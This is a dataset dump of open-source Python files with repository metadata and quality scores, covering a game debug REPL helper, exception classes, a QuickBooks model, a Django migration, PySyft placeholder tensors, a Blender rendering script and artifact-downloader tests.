max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
python/wotdbg.py
wanyancan/wot-debugserver
32
11000
import os.path import tcprepl import BigWorld def echo(s): '''Send string to client''' if tcprepl.write_client is not None: tcprepl.write_client(s) def exec_file(filename, exec_globals=None): ''' Execute file Try to find file named `filename` and execute it. If `exec_globals` is specified it is used as globals-dict in exec context. ''' if exec_globals is None: exec_globals = {} if not os.path.isfile(filename): filename = BigWorld.wg_resolveFileName(filename) with open(filename, 'r') as f: code = f.read() exec code in exec_globals
2.875
3
quicken/_internal/__init__.py
chrahunt/quicken
3
11001
<gh_stars>1-10 class QuickenError(Exception): pass
1.039063
1
folderikon/exceptions.py
demberto/FolderIkon
1
11002
"""Exception which are not actually thrown, only their docstrings are used.""" import colorama import sys __all__ = [ "Error", "ParentIsNotAFolderError", "InvalidURLError", "ImageFormatNotSupportedError", "ImageNotSpecifiedError", "FolderIconAlreadyExistsError", "DesktopIniError", "exception_exit", ] class Error(Exception): """Base class for all FolderIkon errors.""" color = False def __repr__(self): return self.red(self.__doc__) @staticmethod def red(string): if Error.color: return colorama.Fore.RED + string return string class ParentIsNotAFolderError(Error): """Argument passed to --parent is not a folder.""" class InvalidURLError(Error): """Invalid image URL""" def __init__(self, url): self.__url = url super().__init__() def __repr__(self): return super().__repr__() + " " + self.__url class ImageFormatNotSupportedError(Error): def __init__(self, fmt): self.__fmt = fmt super().__init__() def __repr__(self): return f"Image format {self.red(self.__fmt)} is not supported. Only ICO, JPG and PNG are supported." class ImageNotSpecifiedError(Error): """An image with a supported format could not be found in this directory.""" class FolderIconAlreadyExistsError(Error): """Folder icon already exists.""" class DesktopIniError(Error): """The 'desktop.ini' file could not be parsed. Delete it and try again.""" def __init__(self, exc): self.__exc = exc super().__init__() def __repr__(self): exc_name = self.__exc.__class__.__name__ exc_info = f"An exception of {exc_name} occured when parsing it." return super().__repr__() + " " + exc_info def exception_exit(exc): print(repr(exc())) sys.exit(-1)
2.78125
3
quickbooks/objects/companycurrency.py
varunbheemaiah/python-quickbooks
234
11003
<gh_stars>100-1000 from six import python_2_unicode_compatible from .base import QuickbooksManagedObject, QuickbooksTransactionEntity, Ref, CustomField, MetaData @python_2_unicode_compatible class CompanyCurrency(QuickbooksManagedObject, QuickbooksTransactionEntity): """ QBO definition: Applicable only for those companies that enable multicurrency, a companycurrency object defines a currency that is active in the QuickBooks Online company. One or more companycurrency objects are active based on the company's multicurrency business requirements and correspond to the list displayed by the Currency Center in the QuickBooks Online UI """ class_dict = { "CustomField": CustomField, "MetaData": MetaData, } qbo_object_name = "CompanyCurrency" def __init__(self): super(CompanyCurrency, self).__init__() self.Id = None self.Code = "" self.Name = "" self.Active = True self.CustomField = None self.MetaData = None def __str__(self): return self.Name def to_ref(self): ref = Ref() ref.name = self.Name ref.type = self.qbo_object_name ref.value = self.Id return ref
2.5625
3
books/migrations/0004_alter_book_category.py
MwinyiMoha/books-service
0
11004
# Generated by Django 3.2 on 2021-04-10 12:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [("books", "0003_auto_20210410_1231")] operations = [ migrations.AlterField( model_name="book", name="category", field=models.CharField( choices=[ ("fiction", "Fiction"), ("regular", "Regular"), ("novel", "Novel"), ], default="regular", max_length=7, ), ) ]
1.71875
2
syft/execution/placeholder.py
juharris/PySyft
0
11005
<reponame>juharris/PySyft from itertools import zip_longest import syft from syft.generic.frameworks.hook import hook_args from syft.generic.abstract.tensor import AbstractTensor from syft.workers.abstract import AbstractWorker from syft_proto.execution.v1.placeholder_pb2 import Placeholder as PlaceholderPB class PlaceHolder(AbstractTensor): def __init__( self, role=None, tracing=False, id=None, tags: set = None, description: str = None, shape=None, expected_dtype=None, ): """A PlaceHolder acts as a tensor but does nothing special. It can get "instantiated" when a real tensor is appended as a child attribute. It will send forward all the commands it receives to its child tensor. When you send a PlaceHolder, you don't sent the instantiated tensors. Args: id: An optional string or integer id of the PlaceHolder. """ super().__init__(id=id, tags=tags, description=description) if not isinstance(self.id, syft.execution.placeholder_id.PlaceholderId): self.id = syft.execution.placeholder_id.PlaceholderId(self.id) self.expected_shape = tuple(shape) if shape is not None else None self.expected_dtype = expected_dtype self.child = None self.role = role self.tracing = tracing def get_class_attributes(self): """ Specify all the attributes need to build a wrapper correctly when returning a response. """ return {"role": self.role, "tracing": self.tracing} @classmethod def handle_func_command(cls, command): """ Receive an instruction for a function to be applied on a Placeholder, Replace in the args with their child attribute, forward the command instruction to the handle_function_command of the type of the child attributes, get the response and wrap it in a Placeholder. We use this method to perform the tracing. Args: command: instruction of a function command: (command name, <no self>, arguments[, kwargs]) Returns: the response of the function command """ cmd, _, args, kwargs = command # Replace all PlaceHolders with their child attribute new_args, new_kwargs, new_type = hook_args.unwrap_args_from_function(cmd, args, kwargs) # build the new command new_command = (cmd, None, new_args, new_kwargs) # Send it to the appropriate class and get the response response = new_type.handle_func_command(new_command) # Find first placeholder in args template_placeholder = None for arg in args: if isinstance(arg, PlaceHolder): template_placeholder = arg placeholders = PlaceHolder.convert_to_placeholders(response, template_placeholder) if template_placeholder.tracing: template_placeholder.role.register_action( (command, placeholders), syft.execution.computation.ComputationAction ) return placeholders @staticmethod def convert_to_placeholders(response, template_placeholder): """ Turn back response to PlaceHolders """ if isinstance(response, (tuple, list)): placeholders = tuple( PlaceHolder.create_from( r, role=template_placeholder.role, tracing=template_placeholder.tracing ) for r in response ) else: placeholders = PlaceHolder.create_from( response, role=template_placeholder.role, tracing=template_placeholder.tracing ) return placeholders def __getattribute__(self, name): """Try to find the attribute in the current object and in case we can not then we forward it to the child """ try: response = object.__getattribute__(self, name) except AttributeError: child = object.__getattribute__(self, "child") response = getattr(child, name) return response def instantiate(self, tensor): """ Add a tensor as a child attribute. All operations on the placeholder will be also executed on this child tensor. We remove Placeholders if is there are any. """ if isinstance(tensor, PlaceHolder): self.child = tensor.child else: self.child = tensor if hasattr(self.child, "shape"): self.expected_shape = tuple(self.child.shape) if hasattr(self.child, "dtype"): self.expected_dtype = self.child.dtype return self def __str__(self) -> str: """ Compact representation of a Placeholder, including tags and optional child """ tags = " ".join(list(self.tags or [])) out = f"{type(self).__name__ }[Id:{self.id.value}]" if hasattr(self, "child") and self.child is not None: out += f">{self.child}" return out __repr__ = __str__ def send(self, *args, **kwargs): """ calls move on child & register_action to role """ response = self.child.send(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("send", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def move(self, *args, **kwargs): """ calls move on a pointer tensor & register_action to role """ response = self.child.move(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("move", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def share(self, *args, **kwargs): """ Send a command to remote worker to additively share a tensor via pointer tensor """ response = self.child.share(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("share", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def fix_prec(self, *args, **kwargs): """ sends command to remote worker to transform a tensor to fix_precision via pointer tensor """ response = self.child.fix_prec(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("fix_prec", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.computation.ComputationAction ) return placeholder def mid_get(self, *args, **kwargs): response = self.child.mid_get(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(self.child, self) command = ("mid_get", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def remote_get(self, *args, **kwargs): """ calls remote_get on child & register_action to role """ response = self.child.remote_get(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("remote_get", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def remote_send(self, *args, **kwargs): """ calls remote_send on child & register_action to role """ response = self.child.remote_send(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("remote_send", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def share_(self, *args, **kwargs): """ calls share_ on child & register_action to role """ response = self.child.share_(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("share_", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def get(self, *args, **kwargs): """Requests the tensor/chain being pointed to, be serialized and return via child""" response = self.child.get(*args, **kwargs) placeholder = PlaceHolder.convert_to_placeholders(response, self) command = ("get", self, args, kwargs) self.role.register_action( (command, placeholder), syft.execution.communication.CommunicationAction ) return placeholder def copy(self): """ Copying a placeholder doesn't duplicate the child attribute, because all copy operations happen locally where we want to keep reference to the same instantiated object. As the child doesn't get sent, this is not an issue. """ placeholder = PlaceHolder( role=self.role, tracing=self.tracing, tags=self.tags, shape=self.expected_shape, expected_dtype=self.expected_dtype, ) placeholder.child = self.child if self.tracing: command = ("copy", self, (), {}), placeholder self.role.register_action(command, syft.execution.computation.ComputationAction) return placeholder @staticmethod def create_from(tensor, role=None, tracing=False): """ Helper method to create a placeholder already instantiated with tensor. """ return PlaceHolder(role=role, tracing=tracing).instantiate(tensor) @staticmethod def insert(tensor, after, role=None, tracing=False): """ Helper method to add a placeholder in the specific place of tensor chain. """ current_level = tensor while not isinstance(current_level, after) and current_level is not None: current_level = getattr(current_level, "child", None) if current_level is None: raise RuntimeError( f"Cannot insert Placeholder, chain does not contain {after.__name__} tensor type." ) child = getattr(current_level, "child", None) if child is None: raise RuntimeError( f"Cannot insert Placeholder, {after.__name__} does not wrap anything." ) placeholder = PlaceHolder.create_from(child, role, tracing) current_level.child = placeholder return placeholder @staticmethod def extract(tensor): """ Helper method to find and return placeholder in the tensor chain. """ current_level = tensor while not isinstance(current_level, PlaceHolder) and current_level is not None: current_level = getattr(current_level, "child", None) return current_level @staticmethod def create_placeholders(args_shape, args_dtypes=()): """ Helper method to create a list of placeholders with shapes in args_shape. """ # In order to support -1 value in shape to indicate any dimension # we map -1 to 1 for shape dimensions. # TODO: A more complex strategy could be used mapped_shapes = [] for shape in args_shape: if list(filter(lambda x: x < -1, shape)): raise ValueError(f"Invalid shape {shape}") mapped_shapes.append(tuple(map(lambda y: 1 if y == -1 else y, shape))) return [ syft.framework.hook.create_zeros(shape, dtype=dtype, requires_grad=False) for shape, dtype in zip_longest(mapped_shapes, args_dtypes) ] @staticmethod def instantiate_placeholders(obj, response): """ Utility function to instantiate recursively an object containing placeholders with a similar object but containing tensors """ if obj is not None: if isinstance(obj, PlaceHolder): obj.instantiate(response) elif isinstance(obj, (list, tuple)): for ph, rep in zip(obj, response): PlaceHolder.instantiate_placeholders(ph, rep) else: raise ValueError( f"Response of type {type(response)} is not supported in " "Placeholder.instantiate." ) @staticmethod def simplify(worker: AbstractWorker, placeholder: "PlaceHolder") -> tuple: """Takes the attributes of a PlaceHolder and saves them in a tuple. Args: worker: the worker doing the serialization placeholder: a PlaceHolder. Returns: tuple: a tuple holding the unique attributes of the PlaceHolder. """ return ( syft.serde.msgpack.serde._simplify(worker, placeholder.id), syft.serde.msgpack.serde._simplify(worker, placeholder.tags), syft.serde.msgpack.serde._simplify(worker, placeholder.description), syft.serde.msgpack.serde._simplify(worker, placeholder.expected_shape), ) @staticmethod def detail(worker: AbstractWorker, tensor_tuple: tuple) -> "PlaceHolder": """ This function reconstructs a PlaceHolder given it's attributes in form of a tuple. Args: worker: the worker doing the deserialization tensor_tuple: a tuple holding the attributes of the PlaceHolder Returns: PlaceHolder: a PlaceHolder """ tensor_id, tags, description, shape = tensor_tuple tensor_id = syft.serde.msgpack.serde._detail(worker, tensor_id) tags = syft.serde.msgpack.serde._detail(worker, tags) description = syft.serde.msgpack.serde._detail(worker, description) shape = syft.serde.msgpack.serde._detail(worker, shape) return PlaceHolder(id=tensor_id, tags=tags, description=description, shape=shape) @staticmethod def bufferize(worker: AbstractWorker, placeholder: "PlaceHolder") -> PlaceholderPB: """Takes the attributes of a PlaceHolder and saves them in a Protobuf message. Args: worker: the worker doing the serialization placeholder: a PlaceHolder. Returns: PlaceholderPB: a Protobuf message holding the unique attributes of the PlaceHolder. """ protobuf_placeholder = PlaceholderPB() syft.serde.protobuf.proto.set_protobuf_id(protobuf_placeholder.id, placeholder.id.value) protobuf_placeholder.tags.extend(placeholder.tags) if placeholder.description: protobuf_placeholder.description = placeholder.description if placeholder.expected_shape: protobuf_placeholder.expected_shape.dims.extend(placeholder.expected_shape) return protobuf_placeholder @staticmethod def unbufferize(worker: AbstractWorker, protobuf_placeholder: PlaceholderPB) -> "PlaceHolder": """ This function reconstructs a PlaceHolder given it's attributes in form of a Protobuf message. Args: worker: the worker doing the deserialization protobuf_placeholder: a Protobuf message holding the attributes of the PlaceHolder Returns: PlaceHolder: a PlaceHolder """ tensor_id = syft.serde.protobuf.proto.get_protobuf_id(protobuf_placeholder.id) tags = set(protobuf_placeholder.tags) description = None if bool(protobuf_placeholder.description): description = protobuf_placeholder.description expected_shape = tuple(protobuf_placeholder.expected_shape.dims) or None return PlaceHolder(id=tensor_id, tags=tags, description=description, shape=expected_shape) @staticmethod def get_protobuf_schema() -> PlaceholderPB: return PlaceholderPB ### Register the tensor with hook_args.py ### hook_args.default_register_tensor(PlaceHolder)
2.0625
2
creativeflow/blender/render_main.py
idaho777/creativeflow
53
11006
""" MAIN STYLING AND RENDERING FILE Requirements: ------------------------------------------------------------------------------ IMPORTANT! This has only been tested with Blender 2.79 API. We have run this on Linux and MacOS. Execution: ------------------------------------------------------------------------------ This script is intended to run inside blender launched in background mode. Sample invocation is: blender --background --factory-startup --python-exit-code 1 PATH_TO_MY_BLEND.blend \ --python blender/render_main.py -- \ --width=500 <ANY OTHER PYTHON FLAGS FROM render_main.py> '--factory-startup' is used to prevent custom settings from interfering. '--python-exit-code 1' makes blender exit with code 1 if this script throws an error '--' causes blender to ignore all following arguments so python can use them. See blender --help for details. See pipeline.sh for sample usage. Capabilities: ------------------------------------------------------------------------------ It is assumed that blender is invoked with a single blend. This script is a jack-of-all-trades for setting up camera, lighting, styling, and rendering for a custom stylized animation benchmark. We found it easier to run the script separately for each phase of data processing (see pipeline.sh), as this way the output can be easily examined for problems after every stage. However, one-shot execution should also be possible. See flags below for full capabilities. The trickiest bit is: different metadata only works with particular render engine option. The script will raise errors if incorrect engine is specified: - Vertex paint for correspondences - blender render (no gamma correction!) - Normals in camera space - blender render (no gamma correction!) - Flow vector pass - cycles (blender render is buggy) - Red stylit reference material - cycles - Env lighting for mixamo models - blender render only """ import bpy import argparse import logging import os import random import sys import time import traceback # Add to path to make sure we can import modules while running inside Blender. __sdir = os.path.dirname(os.path.realpath(__file__)) if __sdir not in sys.path: sys.path.append(__sdir) import color_util import geo_util import io_util import render_util import stylit_util LOG = logging.getLogger(__name__) if __name__ == "__main__": try: # FLAGS # -------------------------------------------------------------------------- parser = argparse.ArgumentParser( description='Configurable utility to modify blend and/or render images/flow/metadata.') parser.add_argument( '--random_seed', action='store', type=int, default=-1, help='Integer seed for random number generator; used if > 0.') # Rendering ---------------------------------------------------------------- parser.add_argument( '--width', action='store', type=int, default=1500, help='Width to render at.') parser.add_argument( '--height', action='store', type=int, default=1500, help='Height to render at.') parser.add_argument( '--quality_samples', action='store', type=int, default=-1, help='If positive and using cycles, will use this many samples per pixel; ' + 'e.g. 128 is slow, 10 is comparatively fast.') parser.add_argument( '--start_frame', action='store', type=int, default=0, help='Frame to start rendering at (relative to first frame).') parser.add_argument( '--rendered_frames', action='store', type=int, default=0, help='Maximum frames to render; 0 for none; -1 for all.') parser.add_argument( '--skip_existing_frames', action='store_true', default=False, help='If true, skips existing frames matching --frame_output_prefix.') parser.add_argument( '--use_cycles', action='store_true', default=False, help='If true, sets Cycles as the rendering engine, else leaves unchanged.') parser.add_argument( '--use_blender_render', action='store_true', default=False, help='If true, sets Blender Render as the rendering engine, else leaves unchanged.') # Outputs ------------------------------------------------------------------ parser.add_argument( '--frame_output_prefix', action='store', type=str, default='', help='If set, will set image output to <frame_output_prefix><frame#>.PNG; ' + 'should include full path.') parser.add_argument( '--render_metadata_exr', action='store_true', default=False, help='If true, renders all metadata passes as a multilayer EXR file.') parser.add_argument( '--objectids_key_file', action='store', type=str, default='', help='Directory to write objectids to, as images.') parser.add_argument( '--world_normals_output_dir', action='store', type=str, default='', help='Directory to write world space normals to, as images ' + '(only compatible with --use_cycles.') parser.add_argument( '--camera_normals_output_dir', action='store', type=str, default='', help='Directory to write camera space normals to, as images ' + '(only compatible with --use_blender_render.') parser.add_argument( '--enable_gamma_correction', action='store_true', default=False, help='We disable gamma correction by default, as it corrupts the ' + 'metadata rendering; set this on to enable.') parser.add_argument( '--bg_name', action='store', type=str, default="STYMO_BG", help='If any object name matches this substring, it will be treated as ' + 'background for the purpose of id labeling and stylit rendering.') parser.add_argument( '--output_blend', action='store', type=str, default='', help='If set, will output modified blend here (must be absolute path); ' + 'if setting linestyle and/or material, will replace special substrings ' + '<M> and <L> with material and linestyle.') parser.add_argument( '--info_file', action='store', type=str, default='', help='If set, may output auxiliary information into this file.') # Camera ------------------------------------------------------------------- parser.add_argument( '--set_camera', action='store', type=int, default=0, help='If >= 0, selects ith camera and deletes all other cameras; ' + 'if i > num cameras, generates a random one instead.') parser.add_argument( '--keep_extra_cameras', action='store_true', help='If --set_camera, will not delete extra cameras.') parser.add_argument( '--add_random_camera_motion', action='store_true', help='If generating a random camera and this is true, creates zoom/flyaround/pan; ' 'WARNING: parameters are tuned for mixamo character blends.') # Animation range ---------------------------------------------------------- parser.add_argument( '--offset_scene_start_frame_by', action='store', type=int, default=0, help='Unlike --start_frame, which just controls the rendering range, this ' + 'flag offsets the current scene start frame in the timeline by the ' + 'specified amount. Relevant to blends that do not begin at frame 0.') parser.add_argument( '--offset_scene_end_frame_by', action='store', type=int, default=0, help='Unlike --rendered_frames, which just controls the rendering range, this ' + 'flag offsets the current scene end frame in the timeline by the ' + 'specified amount. Relevant to blends that do not begin at frame 0.') # Lighting ----------------------------------------------------------------- parser.add_argument( '--set_env_lighting_image', action='store', type=str, default='', help='Set to image path or directory of environment map images to set ' + 'environment lighting; only works with --use_blender_render.') parser.add_argument( '--set_stylit_lighting', action='store_true', help='If true, sets consistent lighting to render input for stylit.') # Styles ------------------------------------------------------------------- parser.add_argument( '--set_stylit_style', action='store_true', help='If true, sets red material style used for stylit style transfer.') parser.add_argument( '--set_corresp_style', action='store_true', help='If true, will set per-vertex materials to render correspondences.') parser.add_argument( '--set_objectids_style', action='store_true', help='If true, will set objectids to render using flat materials.') parser.add_argument( '--deterministic_objectid_colors', action='store_true', help='If true, objectid colors will not be shuffled; use for testing.') parser.add_argument( '--linestyles_blend', action='store', type=str, default='', help='Path to blend containing all the line styles.') parser.add_argument( '--set_linestyle_matching', action='store', type=str, default='', help='Regex matching linestyle(s) in --line_styles_blend; ' 'if more than one match, picks random one; ' '"" for none; ".*" for all; "hi|bye" to match either.') parser.add_argument( '--randomize_line_color', action='store_true', help='If true, randomizes line color if line is set.') parser.add_argument( '--materials_blend', action='store', type=str, default='', help='Path to blend containing all the material styles (e.g. textured blender styles).') parser.add_argument( '--set_materials_matching', action='store', type=str, default='', help='Regex matching materials(s) in --materials_blend; ' 'if more than one match, picks random one; ' '"" for none; ".*" for all; "hi|bye" to match either.') parser.add_argument( '--randomize_material_color', action='store_true', help='If true, randomizes material color if material is set.') # Custom color control parser.add_argument( '--material_color_choices', action='store', type=str, default='', help='String of format R,G,B R2,G2,B2 ... of colors to choose from if ' + 'randomizing material colors.') parser.add_argument( '--line_hue_range', action='store', type=str, default='0,1.0', help='If --randomize_line_color, will keep HSV Hue in this range (two numbers,csv).') parser.add_argument( '--line_sat_range', action='store', type=str, default='0,1.0', help='If --randomize_line_color, will keep HSV Saturation in this range (two numbers,csv).') parser.add_argument( '--line_value_range', action='store', type=str, default='0,1.0', help='If --randomize_line_color, will keep HSV Value in this range (two numbers,csv).') # Parse only arguments after -- # -------------------------------------------------------------------------- argv = sys.argv if "--" not in argv: argv = [] # as if no args are passed else: argv = argv[argv.index("--") + 1:] args = parser.parse_args(argv) if args.random_seed > 0: print('Using --random_seed=%d as random seed.' % args.random_seed) random.seed(args.random_seed) else: print('Using time as random seed.') random.seed(time.time()) render_util.print_blend_diagnostics() # Handle camera ------------------------------------------------------------ if args.set_camera >= 0: cam = None if args.keep_extra_cameras: cam = geo_util.get_camera_by_number(args.set_camera) else: cam = geo_util.delete_all_but_one_camera(args.set_camera) if cam is None: print('Generating a random camera.') bbox = geo_util.get_scene_bbox() cam = geo_util.create_random_camera(bbox, 2.5, 2.5, 2.5) if args.add_random_camera_motion: print('Adding motion to camera.') geo_util.mixamo_add_random_camera_motion(cam) geo_util.disable_camera_depth_of_field(cam) else: cam = geo_util.get_single_camera_or_die() # Set active camera bpy.context.scene.camera = cam # Handle frame bounds ------------------------------------------------------ orig_start = bpy.context.scene.frame_start bpy.context.scene.frame_start = orig_start + args.offset_scene_start_frame_by if args.offset_scene_end_frame_by > 0: bpy.context.scene.frame_end = orig_start + args.offset_scene_end_frame_by # Handle lighting ---------------------------------------------------------- info_file = None if args.info_file: info_file = open(args.info_file, 'w') if len(args.set_env_lighting_image) > 0: if not args.use_blender_render: raise RuntimeError( 'Error: --set_env_lighting_image="img" only works with --use_blender_render') render_util.setup_realistic_lighting(args.set_env_lighting_image, 10.0, False) if args.set_stylit_lighting: if not args.use_cycles: raise RuntimeError( 'Error: --set_stylit_lighting only works with --use_cycles') stylit_util.setup_stylit_lighting() # Handle styles ------------------------------------------------------------ nstyles = len([x for x in [args.set_stylit_lighting, args.set_corresp_style, args.set_objectids_style, (args.set_linestyle_matching or args.set_materials_matching)] if x]) if nstyles > 1: raise RuntimeError( 'Error: incompatible rendering styles specified; only one of these can be true: ' + '--set_stylit_lighting OR ' + '--set_corresp_style OR --set_objectids_style OR ' + '(--set_linestyle_matching and/or --set_materials_matching)') linestyle_name = 'default' material_name = 'default' if args.set_stylit_style: # Red material used for stylit rendering if not args.use_cycles: raise RuntimeError( 'Error: --set_stylit_style only works with --use_cycles') render_util.clear_unnecessary_settings() stylit_util.setup_stylit_materials(bg_name=args.bg_name) elif args.set_corresp_style: # Per-vertex correspondence rendering if not args.use_blender_render: raise RuntimeError( 'Correspondence rendering (--set_corresp_style) only implemented for ' + '--use_blender_render') render_util.clear_unnecessary_settings() render_util.set_correspondence_style() elif args.set_objectids_style: # Object Ids rendered in flat color if not args.use_blender_render: raise RuntimeError( 'Correspondence rendering (--set_objectids_style) only implemented for ' + '--use_blender_render') render_util.clear_unnecessary_settings() idsinfo = render_util.set_objectids_style( bg_name=args.bg_name, deterministic=args.deterministic_objectid_colors) if idsinfo and args.objectids_key_file: with open(os.path.join(args.objectids_key_file), 'w') as f: for i in range(len(idsinfo)): f.write('%s %d %d %d\n' % (idsinfo[i][0], idsinfo[i][1][0], idsinfo[i][1][1], idsinfo[i][1][2])) elif args.set_linestyle_matching or args.set_materials_matching: # Freestyle / toon shading if not args.use_blender_render: raise RuntimeError( 'Linestyles and materials only implemented for --use_blender_render') render_util.clear_unnecessary_settings() if len(args.set_linestyle_matching) > 0: if len(args.linestyles_blend) == 0: raise RuntimeError( 'Error: Must set --linestyles_blend with line exemplars ' + 'if requesting --set_linestyle_matching.') line_color = None if args.randomize_line_color: line_color = color_util.get_random_color( prob_dark=0.8, bounds=color_util.parse_hsv_bounds(args.line_hue_range, args.line_sat_range, args.line_value_range)) linestyle_name = render_util.set_linestyle( args.linestyles_blend, args.set_linestyle_matching, color=line_color) if info_file: info_file.write('LINESTYLE %s\n' % io_util.strip_blender_name(linestyle_name)) if len(args.set_materials_matching) > 0: if len(args.materials_blend) == 0: raise RuntimeError( 'Error: Must set --materials_blend with material ' + 'exemplars if requesting --set_materials_matching.') mat_color_randomizer = None if args.randomize_material_color: if args.material_color_choices: mat_color_randomizer = color_util.make_color_getter( args.material_color_choices) else: mat_color_randomizer = color_util.make_random_color_getter() material_name = render_util.set_materials( args.materials_blend, args.set_materials_matching, color_randomizer=mat_color_randomizer) if info_file: info_file.write('MATSTYLE %s\n' % io_util.strip_blender_name(material_name)) # Handle rendering settings ------------------------------------------------ if args.use_cycles and args.use_blender_render: raise RuntimeError('Can specify only one of --use_cycles and --use_blender_render') if args.use_cycles or args.use_blender_render: nsamples = (args.quality_samples if args.quality_samples > 0 else None) render_util.set_render_settings(args.use_cycles, nsamples=nsamples, enable_gamma=args.enable_gamma_correction) if args.width > 0 and args.height > 0: render_util.set_width_height(args.width, args.height) if args.world_normals_output_dir or args.camera_normals_output_dir: if args.world_normals_output_dir and args.camera_normals_output_dir: raise RuntimeError('Only one type of normals can be output at once.') if args.world_normals_output_dir and not args.use_cycles: raise RuntimeError('World normals can only be output with --use_cycles.') elif args.camera_normals_output_dir and not args.use_blender_render: raise RuntimeError('Camera space normals can only be output with --use_blender_render.') render_util.init_normals_render_nodes( (args.world_normals_output_dir or args.camera_normals_output_dir), use_cycles=args.use_cycles) # Handle saving ------------------------------------------------------- if len(args.output_blend) > 0: bpy.ops.file.pack_all() args.output_blend = args.output_blend.replace('<M>', io_util.strip_blender_name(material_name)) args.output_blend = args.output_blend.replace('<L>', io_util.strip_blender_name(linestyle_name)) print('Saving blend to %s' % args.output_blend) geo_util.save_blend(args.output_blend) if args.rendered_frames != 0: if args.render_metadata_exr and not args.use_cycles: raise RuntimeError('Must set --use_cycles=True to render out flow with ' + '--render_metadata_exr') print('Rendering frames') render_util.render_animation( args.frame_output_prefix, args.rendered_frames, start_frame_offset=args.start_frame, render_exr=args.render_metadata_exr, skip_existing=args.skip_existing_frames) except Exception as e: tb = traceback.format_exc() LOG.critical(tb) LOG.critical('Script failed') raise e LOG.critical('Script completed')
2.03125
2
atlas/foundations_contrib/src/test/archiving/test_artifact_downloader.py
DeepLearnI/atlas
296
11007
from foundations_spec import * from unittest.mock import call class TestArtifactDownloader(Spec): mock_archiver = let_mock() make_directory_mock = let_patch_mock('os.makedirs') @let def source_directory(self): return self.faker.uri_path() @let def download_directory(self): return self.faker.uri_path() @let def artifact_downloader(self): from foundations_contrib.archiving.artifact_downloader import ArtifactDownloader return ArtifactDownloader(self.mock_archiver) @let def mock_foundations_files(self): return [ 'foundations/a', 'foundations/b', 'foundations_contrib/c', 'foundations_contrib/d', 'foundations_events/e', 'foundations_events/f', 'foundations_internal/g', 'foundations_internal/h', 'jobs/i', 'jobs/j', 'model_serving/k', 'model_serving/l', 'venv/m', 'venv/n', 'docker_image_version.sh', 'download_gui_images.sh', 'foundations_gui.sh', 'foundations_package_manifest.yaml', 'foundations_requirements.txt', 'job.tgz', 'run.env', 'run.sh', 'p.bin', 'q.bin', 'template/t', 'template/u', ] def test_downloads_single_file_to_specified_directory(self): self._mock_file_list(['path/to/my/file']) self.artifact_downloader.download_files('', self.download_directory) self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/my/file', self.download_directory + '/path/to/my/file') def test_downloads_multiple_files_to_specified_directory(self): self._mock_file_list(['different/file', 'other/different/file']) self.artifact_downloader.download_files('', self.download_directory) first_file_download = call('different/file', self.download_directory + '/different/file') second_file_download = call('other/different/file', self.download_directory + '/other/different/file') self.mock_archiver.fetch_persisted_file.assert_has_calls([first_file_download, second_file_download]) def test_ensures_target_directory_exists(self): self._mock_file_list(['path/to/my/file']) self.artifact_downloader.download_files('', self.download_directory) self.make_directory_mock.assert_called_with(self.download_directory + '/path/to/my', exist_ok=True) def test_downloads_multiple_files_to_specified_directory(self): self._mock_file_list(['different/file', 'other/different/file']) self.artifact_downloader.download_files('', self.download_directory) first_dirctory_creation = call(self.download_directory + '/different', exist_ok=True) second_dirctory_creation = call(self.download_directory + '/other/different', exist_ok=True) self.make_directory_mock.assert_has_calls([first_dirctory_creation, second_dirctory_creation]) def test_downloads_only_files_with_specified_source_directory(self): self._mock_file_list(['different/file', 'other/different/file']) self.artifact_downloader.download_files('other/', self.download_directory) self.mock_archiver.fetch_persisted_file.assert_called_once_with('other/different/file', self.download_directory + '/other/different/file') def test_downloads_only_files_with_specified_source_directory_with_different_source_directory(self): self._mock_file_list(['different/file', 'other/different/file']) self.artifact_downloader.download_files('different/', self.download_directory) self.mock_archiver.fetch_persisted_file.assert_called_once_with('different/file', self.download_directory + '/different/file') def test_download_does_not_include_foundations_files(self): for foundations_file in self.mock_foundations_files: self._mock_file_list(['path/to/some/file', foundations_file]) self.artifact_downloader.download_files('', self.download_directory) self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/some/file', self.download_directory + '/path/to/some/file') def test_download_includes_config_yamls(self): for foundations_file in self.mock_foundations_files: self._mock_file_list(['a.config.yaml', foundations_file]) self.artifact_downloader.download_files('', self.download_directory) self.mock_archiver.fetch_persisted_file.assert_called_with('a.config.yaml', self.download_directory + '/a.config.yaml') def _mock_file_list(self, file_list): self.mock_archiver.fetch_miscellaneous = ConditionalReturn() self.mock_archiver.fetch_miscellaneous.return_when(file_list, 'job_artifact_listing.pkl')
2.328125
2
lib/python3.5/functional/test/test_functional.py
mklan/NX-Rom-Market
21
11008
